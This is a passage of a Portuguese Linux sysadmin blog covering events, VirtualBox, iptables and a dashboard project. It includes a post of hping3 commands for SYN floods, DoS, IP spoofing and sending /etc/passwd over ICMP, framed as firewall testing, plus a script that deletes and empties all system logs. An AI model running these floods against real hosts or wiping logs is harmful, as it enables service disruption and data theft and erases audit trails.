5 – Networking, networking, networking! Conhece o pessoal para o lado de Bento? Sabe como é o mercado? Está pensando em juntar vinho e código aberto? A hora é agora então!
6 – Workshop de desenvolvimento Android com o Gustavo Ciello. Não conhece o cara? Sério? Ele fez um workshop monstruoso (no bom sentido) sobre HTML 5 no Tchelinux Pelotas de 2010. Só para dar uma palinha: http://www.slideshare.net/tchelinux/html5-5163188
7 – Elton Luís Minetto. Poderia só citar o nome e mandar jogar no google, mas vou dar o site para ficar mais barbada de conhecer a figura: http://eltonminetto.net/. Autor de 3 livros (já tive o prazer de ler um deles e posso dizer que não é daqueles livros só de encher a estante) vai estar lá para falar sobre Zend Framework.
8 – É analista de sistemas? Tem palestra para você também!!! O grande Marcos Carraro vai mostrar as funcionalidades do Carraro Dashborad para gerenciar o Squid. Algumas informações do projeto estão no blog dele: http://marcoscarraro.blogspot.com/. Ainda temos para complementar o sábio Pahim com “Fedora 15 para sysadmins” e “Virtualização de desktops”, duss palestras imperdiveis para quem quer acompanhar o estado da arte na administração de sistemas.
9 – Está começando no mundo do software livre? Então aproveite a palestra do Guilherme Mar, Luiz Rauber e companhia, “Qual Distro Começar e Qual Distro Trabalhar?”. Certamente vai ser uma bela maneira de começar com o pé direito, e vitar ficar testando o “aspira linux” no teu pc. Se for curioso por jogos, também prestigie o Henrique Sant’anna, que vai mostrar como o PlayOnLinux funciona, para você rodar seus jogos de linux no windows bem na tranquila.
10 – Sou fã de todos os palestrantes do evento, mas um em especial tenho que dar destaque. André Gugliotti com a palestra “Primeiros Passos no Magento Commerce”, já apresentada, com muito sucesso, anteriormente no evento aqui de Pelotas. Para quem não sabe, o Magento recentemente foi comprado pela Ebay, e deve virar o padrão “de facto” para soluções de comércio virtual. Então, se o pessoal do Ebay correu atrás do Magento, você deveria ir atrás também!
Poderia fazer uma lista mais extensa, mas sinceramente, não existe desculpa para não ir a esse evento. Adaptando as palavras de Ciro Bottini:
“Compareça, compareça, compareça!”
Jerônimo “Bottini” Medina Madruga
Créditos e Fonte: http://goo.gl/9mqcO
Read More

quinta-feira, 7 de julho de 2011

VirtualBox 4 vs Fedora 15

Boa Noite Galera,

Mais alguém anda apanhando para instalar o VirtualBox no fedora 15??

Simplesmente instalava como de costume, wget... rpm -ivh... mas ao iniciar voltava um erro.

-------------------------------------------------------------------------------------------------------------

sudo /etc/init.d/vboxdrv setup
Stopping VirtualBox kernel modules                         [  OK  ]
Uninstalling old VirtualBox DKMS kernel modules            [  OK  ]
Trying to register the VirtualBox kernel modules using DKMSError! Bad return status for module build on kernel: 2.6.38.8-32.fc15.i686 (i686)
Consult /var/lib/dkms/vboxhost/4.0.10/build/make.log for more information.
                                                           [FALHOU]
  (Failed, trying without DKMS)
Recompiling VirtualBox kernel modules                      [FALHOU]
  (Look at /var/log/vbox-install.log to find out what went wrong)
--------------------------------------------------------------------------------------------------------------

Procedimentos para instalação.
wget http://download.virtualbox.org/virtualbox/4.0.10/VirtualBox-4.0-4.0.10_72479_fedora15-1.i686.rpm

rpm -ivh VirtualBox-4.0-4.0.10_72479_fedora15-1.i686.rpm

Ok, até aqui normal para a maioria dos casos, ai você tenta iniciar e volta erros e mais erros, agora vem a solução HEHEHE.

# yum search virtualbox-ose
# uname -r
EX para instalar o kernel:.
# yum install kmod-VirtualBox-OSE-2.6.38.8-32.fc15.i686.i686
# yum install -y kernel-headers kernel-devel dkms gcc
# reboot
# /etc/init.d/vboxdrv setup

Feito isso, ele sera quase obrigado a iniciar, caso volte erros, meu caro, revise os procedimentos. HEHHEHE

Marcos Carraro

Editado 20/07/2011 : Após uma atualização do kernel do Fedora para versão 2.6.38.8 tive problemas com o virtualbox segue então a solução... é simples, segue na lógica.

yum install kmod-VirtualBox-OSE-2.6.38.8-35.fc15.i686.i686
Read More

quarta-feira, 6 de julho de 2011

Iptables - Lembrete


Entendendo cadeias do iptables


        +------------+                +---------+               +-------------+
Packet -| PREROUTING |--- routing-----| FORWARD |-------+-------| POSTROUTING |- Packets
input   +------------+    decision    +-­-------+       |       +-------------+    out
                             |                          |
                        +-------+                    +--------+   
                        | INPUT |---- Local process -| OUTPUT |
                        +-------+                    +--------+


OUTPUT - Para pacotes originados e depois saindo do fw, processos locais.

INPUT - Qualquer pacote chegando ao fw, processos locais.
FORWARD - Para pacotes sendo roteados através do seu computador; por exemplo, quando um pacote entra por uma interface de rede e sai por outra. Basicamente a mesma estrutura que temos em todas as redes. Duas eth uma para internet e outra para a rede local.

Outras tabelas do iptables

NAT - Utilizada quando há tradução de endereços (NAT). Exemplo: passagem de dados de uma rede privada para a Internet ou vice-versa. Possui as cadeias PREROUTING, OUTPUT e POSTROUTING.
PREROUTING - Antes de entrar no fw "roteador", fazendo uma manipulação, como um redirecionamento.
POSTROUTING - Utilizado quando se há necessidade de fazer modificação do pacotes depois de ser roteado

MANGLE - Basicamente trabalha com marcação de pacotes e QoS.
Estados

NEW - O pacote está tentando estabelecer uma nova conexão; por exemplo, quando você abre o navegador e este solicita uma uma página web, na verdade ele está tentando criar uma nova conexão com o servidor web onde a página está hospedada.
ESTABLISHED - Um conexão já foi estabelecida pela troca inicial e consensual, de pacotes de estabelecimento de conexão, entre as duas partes; por exemplo, a  requisição da página e o código HTML retornado ao navegador.

RELATED - Um pacote que está iniciando uma nova conexão mas é relacionado a uma conexão existente. Um bom exemplo é o download de arquivos sobre o  protocolo FTP.Quando você se conecta a um servidor FTP, você está  criando uma nova conexão com a porta FTP do servidor remoto.
No entanto, quando você faz o download de um arquivo do servidor FTP utilizando essa conexão, uma segunda conexão é estabelecida entre o seu computador e o servidor para o download específico desse arquivo.
Apesar de ser uma nova conexão, essa está relacionada com a primeira já que sua finalidade á apenas o download do arquivo. Este estilo de filtragem com controle de estado é útil já que essa nova conexão não
utiliza as portas FTP padrão e regras baseadas em portas não são apropriadas nesses casos.
INVALID - Um pacote não estabelece conexão e nem está associado a uma conexão conhecida. Este tipo de pacote deve ser descartado.

Serve mais para uma consulta, assim que eu tiver mais vontade vou melhorando o post.
Marcos Carraro
Read More

sexta-feira, 17 de junho de 2011

yum install hping - Ho ferramenta do capeta #linux

Buenas Glaera,

Tudo certo com vocês? Nunca ninguém responde =="!!
Ferramenta: hping3;
Para que server?
Quem sabe você construiu um firewall show de bola na sua rede, mas não sabe como fazer alguns testes como spoof, syn flooad, DoS, entre outras funções que a mesma tem, não é bem limitada não.
Podemos usar esta ferramenta para testar nosso firewall, verificar se ele consegue barrar ataques DoS, spoof, entre outros, ou para o lado ruim não é o nosso caso galera.
Caso queira mais informações acesse wiki.hping.org

Floodar com 10mil syn um ip na porta 80
hping3 --flood --syn -c 10000 -a 1.2.3.4 -p 80 200.157.25.8

DoS - O ataque DoS, tem a idéia de fazer com que a placa de rede, ip, banda, não consiga respirar, fazendo disso uma parada dos serviços, ela simplesmente não consegue mais responder.
hping3 --flood 200.157.25.8

DoS com outra TTL - Podemos mudar os nossos "HOPS" para chegar em nosso destino como neste caso, e fazemos uma inundação de 100 pacotes com ttl 250 para o IP, podemos usar outras tantas combinações de uma linha.
hping --flood --ttl 250 --count 100 192.168.0.1

Spoof com um falso IP - Esta parte é legal até, podemos mandar milhares de pacotes com outro IP, não cheguei a testar em um FW publico.
hping --spoof 1.2.3.4 192.168.0.1
hping --spoof FALSOIP IPQUENTE

DoS com spoofing - Que tal, fazer um DoS e IP spoofing ao mesmo tempo? Colocamos um IP falso para que o "destino" não desconfie EHEHEHEH. Isso é ate legal de se fazer, com testes interno funciona perfeitamente, Externo é outra história não contada neste blog.
hping --flood --spoof 8.8.8.8 --ttl 66 192.168.0.2

Spoof Loucão - HAHHA que tal mandar várias inundações loucamente para um IP?hping3 --spoof 192.168.0.2 --icmp-ts 192.168.0.1
hping3 --spoof MEUIP --icmp-ts IPDESTINO

Flood com Assinatura - No caso ele vai enviar alguns pacotes com esta rotulação podendo ser um arquivo ou simplesmente na escrita como vemos nos exemplos.
hping3 --flood --syn -a 1.2.3.4 -e “TESTANDO” -S -s 80 192.168.0.1
Criando arquivo de assinatura
echo "** explosao **" > /vat/tmp/assinatura.sig
Enviando o ataque
hping -2 -p 7 192.168.0.3 -d 50 -E /var/tmp/assinatura.sig

Para monitorar
tcpdump -i ethX -nX proto 17

Transferir informações pelo ICMP - Que parte louca, sim quando esta lendo alguns manuais na internet achei engraçado esta parte
hping 192.168.0.3 --icmp –d 100 --sign signature --file /etc/passwd

monitorando
tcpdump -i ethX -nX 

PortScan 
hping3 -I eth0 -S 192.168.0.1 -p ++137
Alguns Exemplos encontrados na internet

hping2 23.23.23.2 -p 80 -S --faster --rand-source

Nesta linha disparamos: -p 80 -S --fast --rand-source (-S setamos a flag como syn, –fast Alias for -i u10000. O Hping irá enviar 10 pacotes por segundos; –rand-source habilita o modo radom e troca o ip de origem dinamicamente). Desta forma enviaremos a cada segundo 10 tentativas de conexão sem esperar a resposta do host-alvo com ips diferentes a cada pacote enviado. Até o momento em que este alvo não poderá responder todas as requisições e o kernel negará o serviço.

Legenda
-F --fin set FIN flag
-S --syn set SYN flag
-R --rst set RST flag
-P --push set PUSH flag
-A --ack set ACK flag
-U --urg set URG flag
-e assinatura
-a meu IP
-p porta
-I interface de rede utilizada ex: hping -I eth1 ......-p ++22 Começa uma contagem a partir da porta de destino 22 vai em ordem crescente 22 23 24 25....
-s porta de origem por padrão ele começa aleatório
-M definir o número de seqüência TCP
-SA Uma maneira de ficar transparente
-i intervalo de tempo (Caso o alvo tenha um IDs ou iptables com modulo recent)
-i 10 (10 segundos)
-i u10 (10 micro segundos)

Para uma mais informações

Editado: 07/07/2011
No blog do Coruja de TI tem um manual de referencias muito útil.
Read More

segunda-feira, 13 de junho de 2011

Segurança na rede

Buenas Galera,

Seguinte, quem de vocês nunca recebeu um e-mail do Banco falando que é preciso reativa sua conta? Mas pare e pense por um minuto, eu não passei meu e-mail para o banco? E porque não mandaram aquelas cartinhas que é preciso ir até a Agência tal?
Pois caros leitores, hoje em dia, vale a pena conferir se tudo é verídico, e ficar com a pulga na orelha, segue o link de um serviço brasileiro "HOOOO funciona" que trás algumas e-mails falsos.

Para mais informações: www.rnp.br/cais/
Read More

sábado, 11 de junho de 2011

E você acha o máximo ficar navegando.

O vídeo é antigo 2009, mas nos traz algumas coisas interessantes, pelo que pode ver na tela do notebook Linux, nmap, wireshark, um exploit de um lado, uma conexão do outro, alguns computadores, e alguns passwords passando em branco (:

Modo Vídeo 
Modo Texto
Read More

quarta-feira, 8 de junho de 2011

Brincando com firewall e ip dinâmico?

Que tal, aquele usuário chato que passa horas no maldito web msn, mas você bloqueia no proxy mas como é https, e você não tem um squid com wpad, deve ser a melhor solução esta. "Ainda não testada por falta de oportunidade e vontade"

string = `ping -c1 www.meebo.com | awk '/from/{print $4}' | awk -F ":" '{print $1}'`

for ip in $string;
do
/sbin/iptables -A OUTPUT -s $ip -J DROP
done

So falta fazer o teste. Quem quiser fazer um teste de um feedback depois.

Alguns artigos legais.
http://www.inf.pucrs.br/~manssour/AWK/index.html
http://www.zago.eti.br/script/awk.html
man awk

abraços Marcos Carraro
Read More

terça-feira, 31 de maio de 2011

limpalog - que tal ter mais tempo?

Bom Dia,

Pensando em dar mais tempo para estudar a um administrador, um script light para limpar todos os logs do sistema (:

Como você vai usar, se no /bin ou ./limpalog isso é o de menos o que importa é o código.



#! /bin/sh
cd /var/log
#limpa arquivos compactados
compact=`find -name "*.gz" | wc -l`
if [ $compact -gt 0 ]
then
#Procura tudo que for .gz log compactatdo dentro do /var/log
compact2=`find -iname "*.gz"`
#apaga arquivos compactatdos
for apaga in $compact2
do
rm -f $apaga
done

# cria lista de todos os arquivos de log que serao limpos
lista=`find -type f`
# executa a limpeza dos logs
for i in $lista
do
echo -n >$i &>/dev/null
done

else

# cria lista de todos os arquivos de log que serao limpos
lista=`find -type f`
# executa a limpeza dos logs
for i in $lista
do
echo -n >$i &>/dev/null
done
fi



Read More

sábado, 28 de maio de 2011

Lançado o Carraro DashBoard

É com enorme satisfação que anuncio a versão-1 do painel "Carraro Dashboard", após anos de desenvolvimento, estratégias validas e inválidas, idéias, estudos, e assim nasceu o "Carraro DashBoard" que tem a função de auxiliar na administração de servidores linux, em especial na parte do gerenciamento do squid, status de serviços, e DHCP, nmap, teste de conectividade, entre outras funções.

Projetado totalmente tem php, html, e alguns Shell script, de fácil entendimento, trazendo uma leveza ao usuário final, e sem ficar dependendo de outros serviços.

Totalmente Open Source, a unica restrição é, de avisar o autor, sobre qualquer alteração que tenha sido feita, assim podendo corrigir bugs, e falhas do sistema, já que o mesmo não trabalha com banco de dados.

Ao passar do tempo, com novas parcerias, novos desenvolvedores, e por conta própria desde de o início do projeto, irei disponibilizar neste blog, e nos demais sites, o manual de como instalar o painel, e é claro, avisar os usuários de novas atualizações, e de novos projetos caso alguém tenha interesse em participar. São eles.

- Criar pagina para mostrar requisições do samba, como ip do mico solicitando tal arquivo, logado com X usuário;
- Criar regras dinâmicas para o squid, como liberar MSN para determinado IP;
- Criar uma maneira de fazer a leitura dos logs do Squid de uma forma mais clara, podendo filtrar por dia, ip, e acessos bloqueado ou liberado;
- Integrar o MSN-Proxy (Esperando sair uma versão que funcione com o msn 2011);
- Integrar PostiFix Admin (Modificar CSS, deixar ele mais claro, adicionar algumas opção como fetchmail admin);

Entre outras tantas idéias que irão surgir aos poucos.

Um forte abraço a todos Marcos Carraro,
==================================================================================

Para download da versão 1.
https://github.com/marcoscarraro/Carraro-Dashboard

Screenshots.

Pagina index (status do sistema)

De Carraro DashBoard

Squid em Tempo Real

De Carraro DashBoard

Dhcp History, juntamente com o teste de conectividade e nmap.

De Carraro DashBoard

Visualizador de Logs do sistema (Ainda em estado de aperfeiçoamento)

De Carraro DashBoard

Tela padrão quando clicado em adicionar

De Carraro DashBoard

Desligar ou Reiniciar o servidor

De Carraro DashBoard

Design Padrão para adição de regras

De Carraro DashBoard

Amarrar o IP ao MAC

De Carraro DashBoard
Read More

Posts que a turma mais esta lendo...

Posts que a turma mais esta lendo...

Marcos Carraro